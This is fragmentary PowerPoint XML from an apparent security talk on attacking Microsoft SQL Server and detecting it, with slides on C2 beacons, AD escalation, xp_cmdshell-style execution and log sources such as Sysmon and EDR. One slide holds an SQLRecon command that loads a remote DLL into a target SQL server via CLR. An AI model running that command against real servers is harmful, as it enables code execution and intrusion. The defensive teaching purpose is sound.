              <a:rPr lang="en-GB" sz="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'hacker', 'sysadmin'</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="8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7F3A5529-20A6-4E75-FC84-E3B9900ED8BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="3"/>
            <a:endCxn id="18" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7093887" y="3664210"/>
            <a:ext cx="55706" cy="1915298"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 510369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EE595BC-018F-8770-85B7-DD02DD9EC084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="3"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7093887" y="5579508"/>
            <a:ext cx="74756" cy="764771"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -305795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 descr="Server with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F99A92-2DD5-DF60-A491-F3F022867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213" y="5144456"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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69B219BE-12DB-622F-1D8E-8F02872295FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="782213" y="3978962"/>
            <a:ext cx="933166" cy="1622695"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51833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A93A76B-A2FA-BE05-6F43-E1289EC126E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642085" y="6009631"/>
            <a:ext cx="1213422" cy="381362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Active Directory Escalations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4F14CE4-4124-81FA-D5A7-9BFF7FF7E4F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9384396" y="5533528"/>
            <a:ext cx="1213422" cy="381362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CUSTOM Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 33" descr="Database with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BD93FF-85D2-FC88-3DE5-786DFBF4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3907" y="4700235"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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1F0FF161-F5F8-B82C-2B34-E6D08A86A14F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="1"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7168643" y="5157435"/>
            <a:ext cx="2365264" cy="1186844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7BD5805-EABA-1BF1-33D1-4859D0319F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8781675" y="5914890"/>
            <a:ext cx="2418863" cy="5708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PAYROLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="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 TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="8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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="8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03C172-8739-5CAE-9D7E-8C1FB3E93360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692299" y="4337345"/>
            <a:ext cx="2418863" cy="5708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SQLRecon.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7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-a Windows -s 192.168.3.22 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7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clr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7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www.seamlessintelligence.com.au</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7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7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hax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0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/sql4.dll -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr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CustomFunctionName</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="700" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr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A4D1D59D-00BB-7123-D363-BF53A78D37F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="0"/>
            <a:endCxn id="37" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2881935" y="2812404"/>
            <a:ext cx="1101007" cy="2519720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20763"/>
              <a:gd name="adj2" fmla="val 66859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DB7B8F2-A1D6-4BDD-9F2B-25B321732878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3226466" y="2958326"/>
            <a:ext cx="780795" cy="381362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C2 Beacon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136AD45-B7A4-5E2F-55AB-31D1A8C75DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1573720" y="4224047"/>
            <a:ext cx="1213422" cy="381362"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solid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Attacker Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4083284813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8322A-5963-4205-1B34-76C9E58E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751" y="281239"/>
            <a:ext cx="7522498" cy="62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3857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BCDAEE-5130-7911-C1F1-04F002AE9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154" y="191192"/>
            <a:ext cx="7737692" cy="647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64567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DBC41B-EFF2-775A-DD17-F2356872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6" y="895348"/>
            <a:ext cx="11798428" cy="50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370607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2327082" y="927540"/>
            <a:ext cx="7537836" cy="460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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Next Up</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU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659414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20B73E-A377-B6D9-5A1A-CDB678CBA9CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1285078" y="671544"/>
            <a:ext cx="9750067" cy="5150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Custom Application Logging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72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 OT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3398580575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1491A-7395-7E18-1E2B-87F936B28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754" y="1655523"/>
            <a:ext cx="7188492" cy="35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627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4255781" y="1295710"/>
            <a:ext cx="7748151" cy="394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OS Security Events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Sysmon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Device Logs from Defender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU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EDR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29756-1D0D-A7C6-25BF-A7A0986C4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8" y="200770"/>
            <a:ext cx="3274081" cy="645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70278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66477B6-006A-2FFD-B896-6C1C4CC2E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7" y="1186086"/>
            <a:ext cx="7487313" cy="44858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70DBC0-DAB6-B8EF-36A2-965FD68DAB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7937770" y="460443"/>
            <a:ext cx="4066163" cy="59662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Enablement and usage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill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SQL extended stored procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4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for Windows shell command execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="44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447830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2327082" y="927540"/>
            <a:ext cx="7537836" cy="460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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Artefacts</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU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051922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D7A34-F177-D71A-8772-7E732506A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80" y="64994"/>
            <a:ext cx="6092310" cy="5230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EDE20-86E6-4642-56BD-61CCE4BBD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559" y="2680447"/>
            <a:ext cx="5760561" cy="369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19739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845355-5452-65C9-40E1-20064A9F6434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2327082" y="927540"/>
            <a:ext cx="7537836" cy="460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ahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-AU" sz="13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ahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea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7843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Server with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3EF672D-06DE-C6F3-6F58-1847FC3B6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429" y="1198659"/>
            <a:ext cx="1791694" cy="1791694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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74B6AE59-AF45-5E17-2FC7-DD368A411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196" y="2184622"/>
            <a:ext cx="1333830" cy="1333830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Artificial Intelligence with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1257E11F-8865-AC14-B29B-0FC51257C9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8911" y="3333585"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Database with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D10CA6D3-E94E-5004-C52D-ED169799B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1259" y="3935234"/>
            <a:ext cx="1791694" cy="1724107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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621FCBA0-32D4-2210-8490-F9331BD21831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rot="10800000" flipV="1">
            <a:off x="2023027" y="2094505"/>
            <a:ext cx="2220403" cy="757031"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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95C05F5C-DE55-CA09-6544-9EAFC13A6097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="1"/>
            <a:endCxn id="10" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6062954" y="3443182"/>
            <a:ext cx="1950971" cy="1354105"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51426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04442C3-B6DC-6E2D-A628-744510DAEA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1924300" y="1492524"/>
            <a:ext cx="2099144" cy="46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Attack via MSSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="16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00B6DD-D306-EB4B-B1D2-C2EA5BA34140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19353895">
            <a:off x="6087069" y="4425232"/>
            <a:ext cx="2099144" cy="46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Not as much</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1600" dirty="0">
              <a:latin typeface="Bahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0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B9DB3D1-A54C-02E5-F07C-897079F4F6C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4680750" y="2580862"/>
            <a:ext cx="1840728" cy="868017"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38409"/>
              <a:gd name="adj2" fmla="val 146489"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="bg2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B122F39-0DF2-51C4-C23D-D0B67A4E52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3924" y="2370024"/>
            <a:ext cx="3680745" cy="214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4658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3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0BF7258-2976-0E70-3BE7-8A6D31857910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224007" y="1295710"/>
            <a:ext cx="6779925" cy="39442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+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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Products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5400" dirty="0">
                <a:latin typeface="Bahnschrift SemiBold Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0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6A80FC-C0B5-B52F-AAC3-E65F055C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8" y="206733"/>
            <a:ext cx="3925726" cy="63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89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ArchwayVTI">
  <a:themeElements>
    <a:clrScheme name="AnalogousFromLightSeedRightStep">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="223A3D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E2E8E8"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C69696"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="BA987F"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="ABA481"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="9CA974"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="90AC82"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="78B07D"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="568D8E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nalogousFromLightSeedRightStep">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="223A3D"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="E2E8E8"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="C69696"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="BA987F"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="ABA481"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="9CA974"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="90AC82"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="78B07D"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="568D8E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9904CB30A87F42AF8EBA4BED7F6D1B" ma:contentTypeVersion="15" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="ea52cdd08e110cdd6a7d4ead33405530">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="7a39dd58-96c2-4d0b-9d0c-16943921d478" xmlns:ns3="aff2ffcc-6c53-4769-bda4-51627e5efde1" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="0e4ed6c899e639c86c6bd4684172d56e" ns2:_="" ns3:_="">
    <xsd:import namespace="7a39dd58-96c2-4d0b-9d0c-16943921d478"/>
    <xsd:import namespace="aff2ffcc-6c53-4769-bda4-51627e5efde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39dd58-96c2-4d0b-9d0c-16943921d4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b60ac33-da6b-40e8-8bee-47ee366e3b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f2ffcc-6c53-4769-bda4-51627e5efde1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7b168400-3fcc-430c-8bec-cf3bda5f13af}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="aff2ffcc-6c53-4769-bda4-51627e5efd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ff2ffcc-6c53-4769-bda4-51627e5efde1" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="7a39dd58-96c2-4d0b-9d0c-16943921d47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1F80B5F-A74B-4771-A533-38B79413BF3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061DC5-3A7C-4912-BAA9-B9FC182D37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39dd58-96c2-4d0b-9d0c-16943921d478"/>
    <ds:schemaRef ds:uri="aff2ffcc-6c53-4769-bda4-51627e5efde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A749CF-168D-4A6F-BF8E-6BFD11A8B5E4}">
  <ds:schemaRefs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aff2ffcc-6c53-4769-bda4-51627e5efde1"/>
    <ds:schemaRef ds:uri="7a39dd58-96c2-4d0b-9d0c-16943921d478"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/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3849</TotalTime>
  <Words>1679</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>253</Paragraphs>
  <Slides>73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Arial</vt:lpstr>
      <vt:lpstr>Bahnschrift SemiBold Condensed</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Felix Titling</vt:lpstr>
      <vt:lpstr>Goudy Old Style</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>ArchwayVTI</vt:lpstr>
      <vt:lpstr>MS S.Q.L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S.Q.L</dc:title>
  <dc:creator>Joseph Slodowy</dc:creator>
  <cp:lastModifiedBy>Tristan Bennett</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-06T07:57:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-13T01:06:49Z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0x010100529904CB30A87F42AF8EBA4BED7F6D1B</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>